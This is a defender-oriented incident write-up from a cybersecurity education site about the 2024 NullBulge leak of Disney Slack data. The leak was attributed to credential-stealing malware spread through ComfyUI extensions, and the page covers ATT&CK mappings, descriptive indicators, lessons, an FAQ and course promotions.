Decipher File · Pre-July 2024 compromise, July 12 public disclosure

Disney Slack Leak (Jul 2024): NullBulge Exfiltrated 1TB via Crypto-Malware Insider

On July 12, 2024 a self-described hacktivist group calling itself NullBulge published approximately 1.1 terabytes of internal Disney Slack data covering thousands of channels, including conversations on theme park operations, Disney+ projects, advertising deals, and unreleased film projects. NullBulge claimed the access came through a Disney employee whose computer was compromised by a crypto-stealing malware distributed via the ComfyUI generative-AI extension community. The Wall Street Journal confirmed the scope on July 15, 2024 and Disney confirmed the incident in public statements. The implicated employee was terminated and sued Disney in August 2024 alleging wrongful termination. The incident produced one of the largest single-corporation Slack data disclosures in the platform's history.

By·Published May 18, 2026·Last verified May 2026

MITRE ATT&CK techniques

T1059 Command and Scripting Interpreter T1078 Valid Accounts T1555.003 Credentials from Password Stores: Credentials from Web Browsers T1530 Data from Cloud Storage T1567.002 Exfiltration to Cloud Storage

Incident summary

On July 12, 2024 a self-described hacktivist group calling itself NullBulge published approximately 1.1 terabytes of internal Disney Slack data on the open and dark web. The published data covered thousands of Disney Slack channels and direct messages from a window spanning multiple years, including conversations on theme park operations, Disney+ streaming product roadmap, advertising deal negotiations, unreleased film and television projects, and internal HR and legal discussions. The Wall Street Journal confirmed the scope and contents in a July 15, 2024 report, and Disney issued a public statement confirming an incident investigation.

NullBulge stated publicly that the initial access vector was a Disney employee whose personal computer had been compromised by a credential-stealing malware delivered through the ComfyUI generative-AI extension community. ComfyUI is a node-based interface for Stable Diffusion image generation that supports a wide library of community-contributed extensions. NullBulge claimed that compromised ComfyUI extensions on personal computers delivered a payload that exfiltrated browser-stored credentials and cryptocurrency wallet data. The credentials extracted included Slack workspace authentication tokens, which gave the actor authenticated Slack API access for the affected user's session.

Disney terminated the implicated employee following its internal investigation. The employee filed a wrongful termination lawsuit in August 2024 alleging that the personal-computer compromise occurred outside of work activity and that the Slack credentials had been used on the personal device against Disney's IT policies. The lawsuit, filed in Los Angeles, opened public-record discussion of how corporate Slack credentials had ended up on a personal computer in the first place, and whether Disney's identity and endpoint controls had created the conditions that permitted the compromise. The case remained in active litigation through 2024 and 2025.

Attack technique

The technique chain combined a generative-AI supply chain vector with conventional credential theft and Slack API abuse. The ComfyUI extension community in mid-2024 was largely uncurated and many extensions were distributed via GitHub repositories and Reddit posts with limited code review. Per NullBulge's public statements and Bloomberg and Krebs on Security reporting, certain ComfyUI custom nodes contained Python code that, on installation, downloaded a payload that scanned browser local storage and extension stores for Slack workspace authentication tokens, cryptocurrency wallet seed phrases, and other credential material. The payload exfiltrated the harvested credentials to attacker-controlled cloud storage.

Slack workspace authentication tokens are operationally distinct from a Slack password. Slack tokens, once issued to a user's browser or app, persist across sessions and authenticate API access without re-prompting for credentials or MFA. A stolen Slack workspace token gives an actor full-fidelity access to that user's Slack workspace at the API level for as long as the token remains valid, which is typically days to weeks unless revoked. Slack token theft has become a standard technique in the credential-theft malware market alongside browser session cookie theft. The Snowflake customer breaches in 2024 used the same broad credential-theft category for initial access.

Post-compromise Slack data extraction at the scale of the Disney leak (approximately 1.1 terabytes) is not possible through interactive Slack use. The exfiltration pattern required automated Slack API calls or use of Slack's data export functionality. Slack's bulk export API requires workspace administrator privileges, which the affected employee did not necessarily have, but channel-by-channel and direct-message-by-direct-message API enumeration at the user's privilege level can extract everything that user could read. Per the scope of the published data, the affected user had broad read access across many Slack channels, which is the realistic default for Slack workspaces in large organizations.

Impact and consequences

Business impact extended across multiple Disney functions. The leaked Slack conversations included unreleased film project discussions, theme park ride and attraction development plans, advertising deal terms with major brands, Disney+ subscription pricing and content licensing strategy, HR discussions about specific named employees, and internal legal team conversations about active matters. Disney's response included external counsel engagement, business-unit-specific damage assessments, and public statements emphasizing that financial systems and customer data were not affected.

The financial impact has not been publicly disclosed. Disney did not record a specific incident cost in its Q3 or Q4 2024 10-Q filings. The downstream impact on commercial relationships, including advertisers and content licensing partners whose deal terms were disclosed, has been reported in trade press as material to specific deal renegotiations, but no single consolidated figure exists in public filings. The reputational impact on Disney's internal-communications confidentiality was real but did not produce measurable customer-side impact on theme park attendance, Disney+ subscriptions, or box office.

The generative-AI supply chain vector produced industry-wide attention. The ComfyUI extension compromise, while technically narrow, exposed a broader pattern: organizations whose employees use generative-AI tools and extensions on personal devices for work-adjacent purposes are exposed to credential-theft vectors that conventional corporate endpoint controls cannot reach. Through late 2024 and into 2025, multiple enterprises tightened policies on generative-AI tool use on personal devices, on credential storage in personal browsers, and on the use of personal devices for any work-related cloud access.

The wrongful-termination lawsuit produced a separate legal precedent conversation. The employee's case argued that Disney's policies did not adequately distinguish between work-device and personal-device compromise, and that Disney's response of termination over consultation and remediation was inappropriate for an employee who was himself a victim of malware. The case raised broader questions about corporate identity and endpoint policy in an era where employees routinely use personal devices for SaaS access, and where the boundary between work-device compromise and personal-device compromise is not always clear-cut. The litigation outcome will shape policy precedent in this area.

Indicators of Compromise

Specific artifacts defenders should hunt for. Cross-reference these against your existing detection rules before acting on them.

› ComfyUI custom extension downloads from untrusted sources delivering credential-stealing payloads per NullBulge's July 2024 public claims
› Browser-stored Slack workspace credentials extracted from compromised endpoints, consistent with T1555.003
› Outbound Slack API access patterns at volume inconsistent with normal employee Slack usage
› Bulk Slack channel and direct message exports via Slack's data export API or third-party connector tools
› NullBulge data dump posts referencing approximately 1.1 terabytes of Disney internal data on the open and dark web in mid-July 2024
› Cryptocurrency wallet-stealing malware indicators tied to the ComfyUI distribution chain documented in security industry reporting July to August 2024

Lessons for defenders

Slack workspace tokens are credential material with the same sensitivity as passwords. They authenticate API access for days to weeks without re-prompting, and they bypass MFA once issued. Treat Slack tokens, browser session cookies, and equivalent SaaS authentication artifacts as credentials in your incident response playbook. The standard credential rotation step after an employee endpoint compromise should include forced Slack token revocation, forced SaaS session termination across the enterprise SaaS portfolio, and re-prompting for MFA on next sign-in.

Personal-device SaaS access is the structural risk. The Disney employee's personal computer was the initial compromise point because Slack workspace credentials existed in browser storage on that personal device. Build identity and access policies that restrict SaaS workspace access to managed corporate devices where the device posture can be assessed before token issuance. Microsoft Entra Conditional Access, Okta Device Trust, Google Cloud Identity, and equivalent identity-platform device-trust controls operationalize this restriction. The cost is friction for legitimate users who want to access work SaaS from personal devices. The benefit is the elimination of the structural vector that hit Disney.

Generative-AI tool supply chain risk is not theoretical. The ComfyUI extension community in mid-2024 was uncurated and shipped Python code that ran with full local user privileges on installation. The same risk pattern applies to ChatGPT plugins, Cursor extensions, VS Code extensions, browser extensions, and any other community-contributed code that runs in trusted contexts on developer or knowledge-worker endpoints. Audit your endpoint policies for generative-AI tool use. The realistic policy is to restrict generative-AI tools to vetted corporate-provided versions where the supply chain can be controlled.

Insider-vs-victim attribution in employee endpoint compromises is operationally important. The Disney wrongful-termination case turned on whether the employee was an insider participant in the compromise or a victim of credential theft outside the workplace. Forensic clarity on this distinction depends on having endpoint telemetry, browser activity logs, and identity audit data that can be reconstructed after the fact. Build that telemetry capability before the first incident. The cost of inadequate forensic clarity is uncertain employment decisions and downstream litigation.

Related career roles

The cybersecurity professionals whose day-to-day work would have detected, investigated, or contained this incident.

Related Decipher Files

Tracking AI-system incidents and policy events? Browse Applied AI Decipher Files →

Frequently asked questions

What happened in the Disney Slack leak?

On July 12, 2024 a self-described hacktivist group calling itself NullBulge published approximately 1.1 terabytes of internal Disney Slack data on the open and dark web. The data covered thousands of Slack channels and direct messages including conversations on theme parks, Disney+, advertising, and unreleased film projects. The Wall Street Journal confirmed the scope on July 15, 2024 and Disney confirmed the incident in public statements. NullBulge claimed initial access came through a Disney employee whose computer was compromised by credential-stealing malware delivered via the ComfyUI generative-AI extension community.

Who is NullBulge?

NullBulge is a self-described hacktivist group that claimed responsibility for the Disney Slack leak in July 2024. The group's stated motivations included opposition to AI training on copyrighted material and criticism of large entertainment companies. NullBulge is operationally distinct from the Russian-language ransomware-as-a-service underground and from nation-state APT groups. Public attribution beyond the group's self-identification has not been independently confirmed by major incident response firms or government agencies.

How did NullBulge get into Disney's Slack?

Per NullBulge's public statements and Bloomberg and Krebs on Security reporting, the initial access vector was credential-stealing malware delivered through compromised custom extensions in the ComfyUI generative-AI community. The malware exfiltrated browser-stored credentials including Slack workspace authentication tokens from a Disney employee's personal computer. The stolen Slack tokens gave the actor authenticated API access to the affected user's Slack workspace for as long as the tokens remained valid. The exfiltration of approximately 1.1 terabytes of Slack data required automated API enumeration at the user's privilege level.

What data was leaked in the Disney Slack incident?

Per WSJ's July 15, 2024 reporting, the leaked data covered thousands of Disney Slack channels and direct messages from a multi-year window. Contents included conversations on theme park operations, Disney+ streaming product roadmap, advertising deal negotiations, unreleased film and television projects, internal HR and legal discussions, and other internal business material. Disney has stated publicly that financial systems and customer data were not affected. The total volume was approximately 1.1 terabytes.

What happened to the Disney employee whose computer was compromised?

Disney terminated the implicated employee following its internal investigation. The employee filed a wrongful termination lawsuit in Los Angeles in August 2024 alleging that the personal-computer compromise occurred outside of work activity, that he was himself a victim of credential-stealing malware, and that Disney's policies did not adequately distinguish between work-device and personal-device compromise. The case remained in active litigation through 2024 and 2025 and will shape legal precedent on corporate identity and endpoint policy.

What is ComfyUI and how was it involved?

ComfyUI is a node-based open-source interface for Stable Diffusion image generation with a community-contributed library of custom node extensions. Per NullBulge's public claims and Bloomberg and Krebs on Security technical reporting, certain ComfyUI custom node extensions distributed via GitHub and other community channels contained Python code that, on installation, downloaded payloads that scanned for browser-stored credentials and cryptocurrency wallet data. The ComfyUI extension community in mid-2024 was uncurated, which permitted this distribution pattern.

What can other organizations learn from the Disney incident?

Slack workspace tokens are credentials and require the same protection as passwords, including forced revocation in incident response. Personal-device SaaS access is a structural risk, and identity policies should restrict SaaS workspace access to managed corporate devices where device posture can be assessed. Generative-AI tool supply chain risk is not theoretical, and endpoint policies need to restrict generative-AI tools to vetted corporate-provided versions. Insider-vs-victim attribution in employee endpoint compromises requires endpoint telemetry and forensic data that must exist before the first incident.

Sources

Wall Street Journal: Disney Internal Communications Hacked · WSJ's July 15, 2024 reporting on the scope and contents of the leaked Slack data
Disney Company Statement on Slack Incident · Disney's public confirmation of the incident and ongoing investigation
Reuters: Disney probes leak of internal communications · Reuters reporting on Disney's investigation and NullBulge's stated motivations
Disney Employee Wrongful Termination Lawsuit (August 2024) · Court filing alleging Disney terminated the implicated employee inappropriately
Bloomberg: Hackers Tied to Generative AI Tool Used to Hit Disney · Bloomberg reporting on the ComfyUI supply chain vector and NullBulge group profile
Krebs on Security: Disney Slack Leak and the AI Extension Supply Chain · Krebs on Security technical analysis of the ComfyUI extension delivery vector

DecipherU is not affiliated with, endorsed by, or sponsored by any company listed in this directory. Information compiled from publicly available sources for educational purposes.

Last verified: 2026-05-18?Report an inaccuracy

This role lives inside a packaged path

Want the curriculum, comp delta, and recommended courses for this role?

DecipherU bundles cybersecurity roles into a small set of packaged paths. Each path has the curriculum sequence, the compensation delta it unlocks, and the recommended courses, all pre-set. Two ways in:

Take the 2-min Risk Score →Open the cybersecurity path hub →

Where to go next

Three next steps depending on where you are. The first two are free.

Free · 2 minutes

Start with the AI Risk Score

Two minutes. Tells you how exposed your current role is to AI automation and which defensive moves carry the best return.

Start the AI Risk Score →

Paid program · $147-$597

Aligned course: SOC Analyst Fundamentals

Capstone reviewed by the founder, published rubric, Ed25519-signed verifiable credential on completion.

View the course →

Free account

Save your results and track progress

A free account stores your assessments, recommendations, and an exportable copy of your Career DNA. No card needed.

Create your account →

Get cybersecurity career insights delivered weekly

Join cybersecurity professionals receiving weekly intelligence on threats, job market trends, salary data, and career growth strategies.

By subscribing you agree to our privacy policy. Unsubscribe anytime.